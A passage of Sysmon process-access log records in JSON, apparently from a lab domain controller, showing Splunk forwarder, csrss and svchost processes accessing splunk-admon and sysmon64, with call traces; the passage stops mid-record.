{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010C57B0B00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010C57B0B00}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010C57B0B00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010C57B0B00}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 